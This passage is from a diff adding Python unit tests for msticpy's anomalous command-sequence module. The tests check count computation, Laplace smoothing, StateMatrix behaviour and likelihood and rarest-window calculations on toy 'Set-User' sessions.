+        actual = cmds_params_only.compute_likelihood_windows_in_session(
+            session=[],
+            prior_probs=self.data3["prior_probs"],
+            trans_probs=self.data3["trans_probs"],
+            param_cond_cmd_probs=self.data3["param_cond_cmd_probs"],
+            window_len=1,
+            use_start_end_tokens=False,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+            use_geo_mean=False,
+        )
+        self.assertListEqual(actual, [])
+
+        actual = cmds_params_only.compute_likelihood_windows_in_session(
+            session=[],
+            prior_probs=self.data3["prior_probs"],
+            trans_probs=self.data3["trans_probs"],
+            param_cond_cmd_probs=self.data3["param_cond_cmd_probs"],
+            window_len=1,
+            use_start_end_tokens=True,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+            use_geo_mean=False,
+        )
+        self.assertListEqual(actual, [0.25])
+
+        actual = cmds_params_only.compute_likelihood_windows_in_session(
+            session=[Cmd("Set-User", {"Identity"})],
+            prior_probs=self.data3["prior_probs"],
+            trans_probs=self.data3["trans_probs"],
+            param_cond_cmd_probs=self.data3["param_cond_cmd_probs"],
+            window_len=1,
+            use_start_end_tokens=False,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+            use_geo_mean=False,
+        )
+        self.assertListEqual(actual, [0.22787717886202657])
+
+    def test_rarest_window_session(self):
+        actual = cmds_params_only.rarest_window_session(
+            session=[],
+            prior_probs=self.data3["prior_probs"],
+            trans_probs=self.data3["trans_probs"],
+            param_cond_cmd_probs=self.data3["param_cond_cmd_probs"],
+            window_len=1,
+            use_start_end_tokens=False,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+            use_geo_mean=False,
+        )
+        self.assertListEqual(actual[0], [])
+        self.assertTrue(np.isnan(actual[1]))
+
+        actual = cmds_params_only.rarest_window_session(
+            session=[],
+            prior_probs=self.data3["prior_probs"],
+            trans_probs=self.data3["trans_probs"],
+            param_cond_cmd_probs=self.data3["param_cond_cmd_probs"],
+            window_len=1,
+            use_start_end_tokens=True,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+            use_geo_mean=False,
+        )
+        self.assertListEqual(actual[0], [])
+        self.assertEqual(actual[1], 0.25)
+
+        actual = cmds_params_only.rarest_window_session(
+            session=[Cmd("Set-User", {"City"}), Cmd("drfjh", {})],
+            prior_probs=self.data3["prior_probs"],
+            trans_probs=self.data3["trans_probs"],
+            param_cond_cmd_probs=self.data3["param_cond_cmd_probs"],
+            window_len=3,
+            use_start_end_tokens=False,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+            use_geo_mean=False,
+        )
+        self.assertListEqual(actual[0], [])
+        self.assertTrue(np.isnan(actual[1]))
+
+        actual = cmds_params_only.rarest_window_session(
+            session=[Cmd("Set-User", {"City"}), Cmd("drfjh", {})],
+            prior_probs=self.data3["prior_probs"],
+            trans_probs=self.data3["trans_probs"],
+            param_cond_cmd_probs=self.data3["param_cond_cmd_probs"],
+            window_len=3,
+            use_start_end_tokens=True,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+            use_geo_mean=False,
+        )
+        self.assertEqual(len(actual[0]), 2)
+        self.assertTrue(~np.isnan(actual[1]))
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/analysis/test_anom_seq_cmds_params_values.py b/tests/analysis/test_anom_seq_cmds_params_values.py
new file mode 100644
index 000000000..8a0ba28a1
--- /dev/null
+++ b/tests/analysis/test_anom_seq_cmds_params_values.py
@@ -0,0 +1,612 @@
+import unittest
+from collections import defaultdict
+
+import numpy as np
+
+from msticpy.analysis.anomalous_sequence.utils import cmds_params_values
+from msticpy.analysis.anomalous_sequence.utils.data_structures import StateMatrix, Cmd
+
+START_TOKEN = "##START##"
+END_TOKEN = "##END##"
+UNK_TOKEN = "##UNK##"
+
+
+class TestCmdsParamsValues(unittest.TestCase):
+    """
+    Test cmds_params_values module.
+
+    Note that when modelling the params:
+
+    We make the modelling assumption that the parameters are independent
+    Bernoulii random variables conditional on the command.
+
+    Note also that because multiple parameters can appear at a time for
+    a command, and because we are computing the probability that each
+    parameter is present or not, we do NOT expect the probabilities to
+    sum to 1.
+
+    Note also that we use laplace smoothing in the counting
+    stage of the calculations. Therefore if you have parameter p which
+    appeared for every occurrence of command c, the resulting
+    probability for param p appearing conditional on command c would
+    NOT equal 1. It would be slightly less due to the laplace smoothing.
+
+    """
+
+    def setUp(self):
+        self.data1 = dict()
+        self.data2 = dict()
+        self.data3 = dict()
+
+        # populate data1
+        self.data1["sessions"] = []
+        self.data1["_seq1_counts"] = defaultdict(lambda: 0)
+        self.data1["seq1_counts"] = StateMatrix({UNK_TOKEN: 2}, UNK_TOKEN)
+        self.data1["_seq2_counts"] = defaultdict(lambda: defaultdict(lambda: 0))
+        self.data1["seq2_counts"] = StateMatrix({UNK_TOKEN: {UNK_TOKEN: 1}}, UNK_TOKEN)
+        self.data1["_param_counts"] = defaultdict(lambda: 0)
+        self.data1["param_counts"] = StateMatrix({UNK_TOKEN: 1}, UNK_TOKEN)
+        self.data1["_cmd_param_counts"] = defaultdict(lambda: defaultdict(lambda: 0))
+        self.data1["cmd_param_counts"] = StateMatrix(
+            {UNK_TOKEN: {UNK_TOKEN: 1}}, UNK_TOKEN
+        )
+        self.data1["_value_counts"] = defaultdict(lambda: 0)
+        self.data1["value_counts"] = StateMatrix({UNK_TOKEN: 1}, UNK_TOKEN)
+        self.data1["_param_value_counts"] = defaultdict(lambda: defaultdict(lambda: 0))
+        self.data1["param_value_counts"] = StateMatrix(
+            {UNK_TOKEN: {UNK_TOKEN: 1}}, UNK_TOKEN
+        )
+        self.data1["prior_probs"] = StateMatrix({UNK_TOKEN: 1}, UNK_TOKEN)
+        self.data1["trans_probs"] = StateMatrix({UNK_TOKEN: {UNK_TOKEN: 1}}, UNK_TOKEN)
+        self.data1["param_probs"] = StateMatrix({UNK_TOKEN: 0.5}, UNK_TOKEN)
+        self.data1["param_cond_cmd_probs"] = StateMatrix(
+            {UNK_TOKEN: {UNK_TOKEN: 0.5}}, UNK_TOKEN
+        )
+        self.data1["value_probs"] = StateMatrix({UNK_TOKEN: 1}, UNK_TOKEN)
+        self.data1["value_cond_param_probs"] = StateMatrix(
+            {UNK_TOKEN: {UNK_TOKEN: 1}}, UNK_TOKEN
+        )
+
+        # populate data2
+        self.data2["sessions"] = [[]]
+        self.data2["_seq1_counts"] = defaultdict(
+            lambda: 0, {START_TOKEN: 1, END_TOKEN: 1}
+        )
+        self.data2["seq1_counts"] = StateMatrix(
+            {UNK_TOKEN: 4, START_TOKEN: 3, END_TOKEN: 3}, UNK_TOKEN
+        )
+        self.data2["_seq2_counts"] = defaultdict(lambda: defaultdict(lambda: 0))
+        self.data2["_seq2_counts"][START_TOKEN][END_TOKEN] = 1
+        self.data2["seq2_counts"] = StateMatrix(
+            {
+                START_TOKEN: {END_TOKEN: 2, UNK_TOKEN: 1},
+                UNK_TOKEN: {END_TOKEN: 1, UNK_TOKEN: 1},
+            },
+            UNK_TOKEN,
+        )
+        self.data2["_param_counts"] = defaultdict(lambda: 0)
+        self.data2["param_counts"] = StateMatrix({UNK_TOKEN: 3}, UNK_TOKEN)
+        self.data2["_cmd_param_counts"] = defaultdict(lambda: defaultdict(lambda: 0))
+        self.data2["cmd_param_counts"] = StateMatrix(
+            {
+                START_TOKEN: {UNK_TOKEN: 1},
+                END_TOKEN: {UNK_TOKEN: 1},
+                UNK_TOKEN: {UNK_TOKEN: 1},
+            },
+            UNK_TOKEN,
+        )
+        self.data2["_value_counts"] = defaultdict(lambda: 0)
+        self.data2["value_counts"] = StateMatrix({UNK_TOKEN: 1}, UNK_TOKEN)
+        self.data2["_param_value_counts"] = defaultdict(lambda: defaultdict(lambda: 0))
+        self.data2["param_value_counts"] = StateMatrix(
+            {UNK_TOKEN: {UNK_TOKEN: 1}}, UNK_TOKEN
+        )
+        self.data2["prior_probs"] = StateMatrix(
+            {START_TOKEN: 0.3, END_TOKEN: 0.3, UNK_TOKEN: 0.4}, UNK_TOKEN
+        )
+        self.data2["trans_probs"] = StateMatrix(
+            {
+                START_TOKEN: {
+                    END_TOKEN: 0.6666666666666666,
+                    UNK_TOKEN: 0.3333333333333333,
+                },
+                UNK_TOKEN: {END_TOKEN: 0.5, UNK_TOKEN: 0.5},
+            },
+            UNK_TOKEN,
+        )
+        self.data2["param_probs"] = StateMatrix({UNK_TOKEN: 0.3}, UNK_TOKEN)
+        self.data2["param_cond_cmd_probs"] = StateMatrix(
+            {
+                START_TOKEN: {UNK_TOKEN: 0.3333333333333333},
+                END_TOKEN: {UNK_TOKEN: 0.3333333333333333},
+                UNK_TOKEN: {UNK_TOKEN: 0.25},
+            },
+            UNK_TOKEN,
+        )
+        self.data2["value_probs"] = StateMatrix({UNK_TOKEN: 1}, UNK_TOKEN)
+        self.data2["value_cond_param_probs"] = StateMatrix(
+            {UNK_TOKEN: {UNK_TOKEN: 1}}, UNK_TOKEN
+        )
+
+        # populate data3
+        cmd = "Set-User"
+        self.data3["sessions"] = [
+            [
+                Cmd(name="Set-User", params={"City": "york", "Identity": "blah"}),
+                Cmd(name="Set-User", params={"Identity": "blah"}),
+            ]
+        ]
+        self.data3["_seq1_counts"] = defaultdict(
+            lambda: 0, {START_TOKEN: 1, END_TOKEN: 1, cmd: 2}
+        )
+        self.data3["seq1_counts"] = StateMatrix(
+            {UNK_TOKEN: 6, START_TOKEN: 4, END_TOKEN: 4, cmd: 8}, UNK_TOKEN
+        )
+        self.data3["_seq2_counts"] = defaultdict(lambda: defaultdict(lambda: 0))
+        self.data3["_seq2_counts"][START_TOKEN][cmd] = 1
+        self.data3["_seq2_counts"][cmd][END_TOKEN] = 1
+        self.data3["_seq2_counts"][cmd][cmd] = 1
+        self.data3["seq2_counts"] = StateMatrix(
+            {
+                START_TOKEN: {END_TOKEN: 1, UNK_TOKEN: 1, cmd: 2},
+                UNK_TOKEN: {END_TOKEN: 1, UNK_TOKEN: 1, cmd: 1},
+                cmd: {cmd: 2, END_TOKEN: 2, UNK_TOKEN: 1},
+            },
+            UNK_TOKEN,
+        )
+        self.data3["_param_counts"] = defaultdict(lambda: 0, {"Identity": 2, "City": 1})
+        self.data3["param_counts"] = StateMatrix(
+            {UNK_TOKEN: 4, "City": 2, "Identity": 3}, UNK_TOKEN
+        )
+        self.data3["_cmd_param_counts"] = defaultdict(lambda: defaultdict(lambda: 0))
+        self.data3["_cmd_param_counts"][cmd]["Identity"] = 2
+        self.data3["_cmd_param_counts"][cmd]["City"] = 1
+        self.data3["cmd_param_counts"] = StateMatrix(
+            {
+                START_TOKEN: {UNK_TOKEN: 1},
+                END_TOKEN: {UNK_TOKEN: 1},
+                UNK_TOKEN: {UNK_TOKEN: 1},
+                cmd: {"City": 2, "Identity": 3, UNK_TOKEN: 1},
+            },
+            UNK_TOKEN,
+        )
+        self.data3["_value_counts"] = defaultdict(lambda: 0, {"york": 1, "blah": 2})
+        self.data3["value_counts"] = StateMatrix(
+            {"york": 2, "blah": 3, UNK_TOKEN: 3}, UNK_TOKEN
+        )
+        self.data3["_param_value_counts"] = defaultdict(lambda: defaultdict(lambda: 0))
+        self.data3["_param_value_counts"]["City"]["york"] = 1
+        self.data3["_param_value_counts"]["Identity"]["blah"] = 2
+        self.data3["param_value_counts"] = StateMatrix(
+            {
+                "City": {"york": 2, UNK_TOKEN: 1},
+                "Identity": {"blah": 3, UNK_TOKEN: 1},
+                UNK_TOKEN: {UNK_TOKEN: 1},
+            },
+            UNK_TOKEN,
+        )
+        self.data3["prior_probs"] = StateMatrix(
+            {
+                START_TOKEN: 0.18181818181818182,
+                END_TOKEN: 0.18181818181818182,
+                UNK_TOKEN: 0.2727272727272727,
+                cmd: 0.36363636363636365,
+            },
+            UNK_TOKEN,
+        )
+        self.data3["trans_probs"] = StateMatrix(
+            {
+                START_TOKEN: {END_TOKEN: 0.25, UNK_TOKEN: 0.25, cmd: 0.5},
+                UNK_TOKEN: {END_TOKEN: 1 / 3, UNK_TOKEN: 1 / 3, cmd: 1 / 3},
+                cmd: {END_TOKEN: 0.4, UNK_TOKEN: 0.2, cmd: 0.4},
+            },
+            UNK_TOKEN,
+        )
+        self.data3["param_probs"] = StateMatrix(
+            {
+                UNK_TOKEN: 0.18181818181818182,
+                "Identity": 0.13636363636363635,
+                "City": 0.09090909090909091,
+            },
+            UNK_TOKEN,
+        )
+        self.data3["param_cond_cmd_probs"] = StateMatrix(
+            {
+                START_TOKEN: {UNK_TOKEN: 0.25},
+                END_TOKEN: {UNK_TOKEN: 0.25},
+                UNK_TOKEN: {UNK_TOKEN: 0.16666666666666666},
+                cmd: {"City": 0.25, "Identity": 0.375, UNK_TOKEN: 0.125},
+            },
+            UNK_TOKEN,
+        )
+        self.data3["value_probs"] = StateMatrix(
+            {"york": 0.25, "blah": 0.375, UNK_TOKEN: 0.375}, UNK_TOKEN
+        )
+        self.data3["value_cond_param_probs"] = StateMatrix(
+            {
+                "City": {"york": 0.6666666666666666, UNK_TOKEN: 0.3333333333333333},
+                "Identity": {"blah": 0.75, UNK_TOKEN: 0.25},
+                UNK_TOKEN: {UNK_TOKEN: 1.0},
+            },
+            UNK_TOKEN,
+        )
+
+    def tearDown(self):
+        self.data1 = None
+        self.data2 = None
+        self.data3 = None
+
+    def test_compute_counts(self):
+        (
+            seq1_actual,
+            seq2_actual,
+            param_actual,
+            cmd_param_actual,
+            val_actual,
+            param_val_actual,
+        ) = cmds_params_values.compute_counts(
+            sessions=self.data1["sessions"],
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+        )
+
+        self.assertDictEqual(seq1_actual, self.data1["_seq1_counts"])
+        self.assertDictEqual(seq2_actual, self.data1["_seq2_counts"])
+        self.assertDictEqual(param_actual, self.data1["_param_counts"])
+        self.assertDictEqual(cmd_param_actual, self.data1["_cmd_param_counts"])
+        self.assertDictEqual(val_actual, self.data1["_value_counts"])
+        self.assertDictEqual(param_val_actual, self.data1["_param_value_counts"])
+
+        (
+            seq1_actual,
+            seq2_actual,
+            param_actual,
+            cmd_param_actual,
+            val_actual,
+            param_val_actual,
+        ) = cmds_params_values.compute_counts(
+            sessions=self.data2["sessions"],
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+        )
+
+        self.assertDictEqual(seq1_actual, self.data2["_seq1_counts"])
+        self.assertDictEqual(seq2_actual, self.data2["_seq2_counts"])
+        self.assertDictEqual(param_actual, self.data2["_param_counts"])
+        self.assertDictEqual(cmd_param_actual, self.data2["_cmd_param_counts"])
+        self.assertDictEqual(val_actual, self.data2["_value_counts"])
+        self.assertDictEqual(param_val_actual, self.data2["_param_value_counts"])
+
+        (
+            seq1_actual,
+            seq2_actual,
+            param_actual,
+            cmd_param_actual,
+            val_actual,
+            param_val_actual,
+        ) = cmds_params_values.compute_counts(
+            sessions=self.data3["sessions"],
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+        )
+
+        self.assertDictEqual(seq1_actual, self.data3["_seq1_counts"])
+        self.assertDictEqual(seq2_actual, self.data3["_seq2_counts"])
+        self.assertDictEqual(param_actual, self.data3["_param_counts"])
+        self.assertDictEqual(cmd_param_actual, self.data3["_cmd_param_counts"])
+        self.assertDictEqual(val_actual, self.data3["_value_counts"])
+        self.assertDictEqual(param_val_actual, self.data3["_param_value_counts"])
+
+    def test_laplace_smooth_counts(self):
+        (
+            seq1_actual,
+            seq2_actual,
+            param_actual,
+            cmd_param_actual,
+            val_actual,
+            param_val_actual,
+        ) = cmds_params_values.laplace_smooth_counts(
+            seq1_counts=self.data1["_seq1_counts"],
+            seq2_counts=self.data1["_seq2_counts"],
+            param_counts=self.data1["_param_counts"],
+            cmd_param_counts=self.data1["_cmd_param_counts"],
+            value_counts=self.data1["_value_counts"],
+            param_value_counts=self.data1["_param_value_counts"],
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+            unk_token=UNK_TOKEN,
+        )
+
+        self.assertDictEqual(seq1_actual, self.data1["seq1_counts"])
+        self.assertDictEqual(seq2_actual, self.data1["seq2_counts"])
+        self.assertDictEqual(param_actual, self.data1["param_counts"])
+        self.assertDictEqual(cmd_param_actual, self.data1["cmd_param_counts"])
+        self.assertDictEqual(val_actual, self.data1["value_counts"])
+        self.assertDictEqual(param_val_actual, self.data1["param_value_counts"])
+
+        (
+            seq1_actual,
+            seq2_actual,
+            param_actual,
+            cmd_param_actual,
+            val_actual,
+            param_val_actual,
+        ) = cmds_params_values.laplace_smooth_counts(
+            seq1_counts=self.data2["_seq1_counts"],
+            seq2_counts=self.data2["_seq2_counts"],
+            param_counts=self.data2["_param_counts"],
+            cmd_param_counts=self.data2["_cmd_param_counts"],
+            value_counts=self.data2["_value_counts"],
+            param_value_counts=self.data2["_param_value_counts"],
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+            unk_token=UNK_TOKEN,
+        )
+
+        self.assertDictEqual(seq1_actual, self.data2["seq1_counts"])
+        self.assertDictEqual(seq2_actual, self.data2["seq2_counts"])
+        self.assertDictEqual(param_actual, self.data2["param_counts"])
+        self.assertDictEqual(cmd_param_actual, self.data2["cmd_param_counts"])
+        self.assertDictEqual(val_actual, self.data2["value_counts"])
+        self.assertDictEqual(param_val_actual, self.data2["param_value_counts"])
+
+        (
+            seq1_actual,
+            seq2_actual,
+            param_actual,
+            cmd_param_actual,
+            val_actual,
+            param_val_actual,
+        ) = cmds_params_values.laplace_smooth_counts(
+            seq1_counts=self.data3["_seq1_counts"],
+            seq2_counts=self.data3["_seq2_counts"],
+            param_counts=self.data3["_param_counts"],
+            cmd_param_counts=self.data3["_cmd_param_counts"],
+            value_counts=self.data3["_value_counts"],
+            param_value_counts=self.data3["_param_value_counts"],
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+            unk_token=UNK_TOKEN,
+        )
+
+        self.assertDictEqual(seq1_actual, self.data3["seq1_counts"])
+        self.assertDictEqual(seq2_actual, self.data3["seq2_counts"])
+        self.assertDictEqual(param_actual, self.data3["param_counts"])
+        self.assertDictEqual(cmd_param_actual, self.data3["cmd_param_counts"])
+        self.assertDictEqual(val_actual, self.data3["value_counts"])
+        self.assertDictEqual(param_val_actual, self.data3["param_value_counts"])
+
+    def test_get_params_to_model_values(self):
+        actual = cmds_params_values.get_params_to_model_values(
+            param_counts=self.data1["param_counts"],
+            param_value_counts=self.data1["param_value_counts"],
+        )
+        self.assertSetEqual(actual, set())
+
+        actual = cmds_params_values.get_params_to_model_values(
+            param_counts={"Identity": 50, "city": 2, UNK_TOKEN: 1},
+            param_value_counts={
+                "Identity": {"haha": 25, "hehe": 24, UNK_TOKEN: 1},
+                "city": {"york": 1, UNK_TOKEN: 1},
+                UNK_TOKEN: {UNK_TOKEN: 1},
+            },
+        )
+        self.assertSetEqual(actual, {"Identity"})
+
+    def test_compute_prob_setofparams_given_cmd(self):
+        actual = cmds_params_values.compute_prob_setofparams_given_cmd(
+            cmd="Set-User",
+            params_with_vals=dict(),
+            param_cond_cmd_probs=self.data3["param_cond_cmd_probs"],
+            value_cond_param_probs=self.data3["value_cond_param_probs"],
+            modellable_params=set(),
+            use_geo_mean=False,
+        )
+        self.assertEqual(actual, 1)
+        actual = cmds_params_values.compute_prob_setofparams_given_cmd(
+            cmd="Set-User",
+            params_with_vals={"Identity": "blah"},
+            param_cond_cmd_probs=self.data3["param_cond_cmd_probs"],
+            value_cond_param_probs=self.data3["value_cond_param_probs"],
+            modellable_params=set(),
+            use_geo_mean=False,
+        )
+        self.assertEqual(actual, 0.24609375)
+
+        actual = cmds_params_values.compute_prob_setofparams_given_cmd(
+            cmd="Set-User",
+            params_with_vals={"Identity": "blah"},
+            param_cond_cmd_probs=self.data3["param_cond_cmd_probs"],
+            value_cond_param_probs=self.data3["value_cond_param_probs"],
+            modellable_params={"Identity"},
+            use_geo_mean=False,
+        )
+        self.assertEqual(actual, 0.1845703125)
+
+    def test_compute_likelihood_window(self):
+        actual = cmds_params_values.compute_likelihood_window(
+            window=[],
+            prior_probs=self.data3["prior_probs"],
+            trans_probs=self.data3["trans_probs"],
+            param_cond_cmd_probs=self.data3["param_cond_cmd_probs"],
+            value_cond_param_probs=self.data3["value_cond_param_probs"],
+            modellable_params=set(),
+            use_start_token=False,
+            use_end_token=False,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+        )
+        self.assertTrue(np.isnan(actual))
+
+        actual = cmds_params_values.compute_likelihood_window(
+            window=[Cmd("Set-User", {"Identity": "blah"})],
+            prior_probs=self.data3["prior_probs"],
+            trans_probs=self.data3["trans_probs"],
+            param_cond_cmd_probs=self.data3["param_cond_cmd_probs"],
+            value_cond_param_probs=self.data3["value_cond_param_probs"],
+            modellable_params=set(),
+            use_start_token=False,
+            use_end_token=False,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+        )
+        self.assertEqual(actual, 0.22787717886202657)
+
+        actual = cmds_params_values.compute_likelihood_window(
+            window=[Cmd("Set-User", {"Identity": "blah"})],
+            prior_probs=self.data3["prior_probs"],
+            trans_probs=self.data3["trans_probs"],
+            param_cond_cmd_probs=self.data3["param_cond_cmd_probs"],
+            value_cond_param_probs=self.data3["value_cond_param_probs"],
+            modellable_params={"Identity"},
+            use_start_token=False,
+            use_end_token=False,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+        )
+        self.assertEqual(actual, 0.23834594522854924)
+
+        actual = cmds_params_values.compute_likelihood_window(
+            window=[Cmd("Set-User", {"Identity": "blah"})],
+            prior_probs=self.data3["prior_probs"],
+            trans_probs=self.data3["trans_probs"],
+            param_cond_cmd_probs=self.data3["param_cond_cmd_probs"],
+            value_cond_param_probs=self.data3["value_cond_param_probs"],
+            modellable_params=set(),
+            use_start_token=True,
+            use_end_token=False,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+        )
+        self.assertEqual(actual, 0.31333112093528653)
+
+        actual = cmds_params_values.compute_likelihood_window(
+            window=[Cmd("Set-User", {"Identity": "blah"})],
+            prior_probs=self.data3["prior_probs"],
+            trans_probs=self.data3["trans_probs"],
+            param_cond_cmd_probs=self.data3["param_cond_cmd_probs"],
+            value_cond_param_probs=self.data3["value_cond_param_probs"],
+            modellable_params=set(),
+            use_start_token=False,
+            use_end_token=True,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+        )
+        self.assertEqual(actual, 0.09115087154481064)
+
+    def test_compute_likelihood_windows_in_session(self):
+        actual = cmds_params_values.compute_likelihood_windows_in_session(
+            session=[],
+            prior_probs=self.data3["prior_probs"],
+            trans_probs=self.data3["trans_probs"],
+            param_cond_cmd_probs=self.data3["param_cond_cmd_probs"],
+            value_cond_param_probs=self.data3["value_cond_param_probs"],
+            modellable_params=set(),
+            window_len=1,
+            use_start_end_tokens=False,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+            use_geo_mean=False,
+        )
+        self.assertListEqual(actual, [])
+
+        actual = cmds_params_values.compute_likelihood_windows_in_session(
+            session=[],
+            prior_probs=self.data3["prior_probs"],
+            trans_probs=self.data3["trans_probs"],
+            param_cond_cmd_probs=self.data3["param_cond_cmd_probs"],
+            value_cond_param_probs=self.data3["value_cond_param_probs"],
+            modellable_params=set(),
+            window_len=1,
+            use_start_end_tokens=True,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+            use_geo_mean=False,
+        )
+        self.assertListEqual(actual, [0.25])
+
+        actual = cmds_params_values.compute_likelihood_windows_in_session(
+            session=[Cmd("Set-User", {"Identity": "blah"})],
+            prior_probs=self.data3["prior_probs"],
+            trans_probs=self.data3["trans_probs"],
+            param_cond_cmd_probs=self.data3["param_cond_cmd_probs"],
+            value_cond_param_probs=self.data3["value_cond_param_probs"],
+            modellable_params=set(),
+            window_len=1,
+            use_start_end_tokens=False,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+            use_geo_mean=False,
+        )
+        self.assertListEqual(actual, [0.22787717886202657])
+
+    def test_rarest_window_session(self):
+        actual = cmds_params_values.rarest_window_session(
+            session=[],
+            prior_probs=self.data3["prior_probs"],
+            trans_probs=self.data3["trans_probs"],
+            param_cond_cmd_probs=self.data3["param_cond_cmd_probs"],
+            value_cond_param_probs=self.data3["value_cond_param_probs"],
+            modellable_params=set(),
+            window_len=1,
+            use_start_end_tokens=False,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+            use_geo_mean=False,
+        )
+        self.assertListEqual(actual[0], [])
+        self.assertTrue(np.isnan(actual[1]))
+
+        actual = cmds_params_values.rarest_window_session(
+            session=[],
+            prior_probs=self.data3["prior_probs"],
+            trans_probs=self.data3["trans_probs"],
+            param_cond_cmd_probs=self.data3["param_cond_cmd_probs"],
+            value_cond_param_probs=self.data3["value_cond_param_probs"],
+            modellable_params=set(),
+            window_len=1,
+            use_start_end_tokens=True,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+            use_geo_mean=False,
+        )
+        self.assertListEqual(actual[0], [])
+        self.assertEqual(actual[1], 0.25)
+
+        actual = cmds_params_values.rarest_window_session(
+            session=[Cmd("Set-User", {"City": "york"}), Cmd("drfjh", {})],
+            prior_probs=self.data3["prior_probs"],
+            trans_probs=self.data3["trans_probs"],
+            param_cond_cmd_probs=self.data3["param_cond_cmd_probs"],
+            value_cond_param_probs=self.data3["value_cond_param_probs"],
+            modellable_params=set(),
+            window_len=3,
+            use_start_end_tokens=False,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+            use_geo_mean=False,
+        )
+
+        self.assertListEqual(actual[0], [])
+        self.assertTrue(np.isnan(actual[1]))
+
+        actual = cmds_params_values.rarest_window_session(
+            session=[Cmd("Set-User", {"City": "york"}), Cmd("drfjh", {})],
+            prior_probs=self.data3["prior_probs"],
+            trans_probs=self.data3["trans_probs"],
+            param_cond_cmd_probs=self.data3["param_cond_cmd_probs"],
+            value_cond_param_probs=self.data3["value_cond_param_probs"],
+            modellable_params=set(),
+            window_len=3,
+            use_start_end_tokens=True,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+            use_geo_mean=False,
+        )
+
+        self.assertEqual(len(actual[0]), 2)
+        self.assertTrue(~np.isnan(actual[1]))
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/analysis/test_anom_seq_data_structures.py b/tests/analysis/test_anom_seq_data_structures.py
new file mode 100644
index 000000000..cf388769b
--- /dev/null
+++ b/tests/analysis/test_anom_seq_data_structures.py
@@ -0,0 +1,37 @@
+import unittest
+
+from msticpy.analysis.anomalous_sequence.utils.data_structures import StateMatrix
+from msticpy.common.exceptions import MsticpyException
+
+START_TOKEN = "##START##"
+END_TOKEN = "##END##"
+UNK_TOKEN = "##UNK##"
+
+
+class TestDataStructures(unittest.TestCase):
+    def test_state_matrix(self):
+        self.assertRaises(MsticpyException, lambda: StateMatrix({"haha": 1}, UNK_TOKEN))
+        self.assertRaises(MsticpyException, lambda: StateMatrix(dict(), UNK_TOKEN))
+        states = {"haha": {"lol": 1, UNK_TOKEN: 1}, UNK_TOKEN: {"hehe": 1}}
+        self.assertRaises(MsticpyException, lambda: StateMatrix(states, UNK_TOKEN))
+
+        states = {"haha": 2, UNK_TOKEN: 5}
+        states_matrix = StateMatrix(states, UNK_TOKEN)
+        self.assertEqual(states_matrix["kjfkjhf"], states_matrix[UNK_TOKEN])
+
+        states = {
+            "haha": {"hehe": 1, UNK_TOKEN: 4},
+            UNK_TOKEN: {UNK_TOKEN: 6, "lol": 78},
+        }
+        states_matrix = StateMatrix(states, UNK_TOKEN)
+        self.assertEqual(
+            states_matrix["kidhf"]["kfji"], states_matrix[UNK_TOKEN][UNK_TOKEN]
+        )
+        self.assertEqual(
+            states_matrix["haha"]["kjdff"], states_matrix["haha"][UNK_TOKEN]
+        )
+        self.assertEqual(states_matrix["haha"]["hehe"], 1)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/analysis/test_anom_seq_laplace_smooth.py b/tests/analysis/test_anom_seq_laplace_smooth.py
new file mode 100644
index 000000000..5202326a4
--- /dev/null
+++ b/tests/analysis/test_anom_seq_laplace_smooth.py
@@ -0,0 +1,224 @@
+import unittest
+from collections import defaultdict
+
+from msticpy.analysis.anomalous_sequence.utils import laplace_smooth
+from msticpy.analysis.anomalous_sequence.utils.data_structures import Cmd
+
+START_TOKEN = "##START##"
+END_TOKEN = "##END##"
+UNK_TOKEN = "##UNK##"
+
+
+class TestLaplaceSmooth(unittest.TestCase):
+    def setUp(self):
+        self.data1 = dict()
+        self.data2 = dict()
+        self.data3 = dict()
+
+        # populate data1
+        self.data1["sessions"] = []
+        self.data1["seq1_counts"] = defaultdict(lambda: 0)
+        self.data1["seq1_counts_ls"] = {UNK_TOKEN: 2}
+        self.data1["seq2_counts"] = defaultdict(lambda: defaultdict(lambda: 0))
+        self.data1["seq2_counts_ls"] = {UNK_TOKEN: {UNK_TOKEN: 1}}
+        self.data1["param_counts"] = defaultdict(lambda: 0)
+        self.data1["param_counts_ls"] = {UNK_TOKEN: 1}
+        self.data1["cmd_param_counts"] = defaultdict(lambda: defaultdict(lambda: 0))
+        self.data1["cmd_param_counts_ls"] = {UNK_TOKEN: {UNK_TOKEN: 1}}
+        self.data1["value_counts"] = defaultdict(lambda: 0)
+        self.data1["value_counts_ls"] = {UNK_TOKEN: 1}
+        self.data1["param_value_counts"] = defaultdict(lambda: defaultdict(lambda: 0))
+        self.data1["param_value_counts_ls"] = {UNK_TOKEN: {UNK_TOKEN: 1}}
+        self.data1["cmds"] = [UNK_TOKEN]
+        self.data1["params"] = [UNK_TOKEN]
+
+        # populate data2
+        self.data2["sessions"] = [[]]
+        self.data2["seq1_counts"] = defaultdict(
+            lambda: 0, {START_TOKEN: 1, END_TOKEN: 1}
+        )
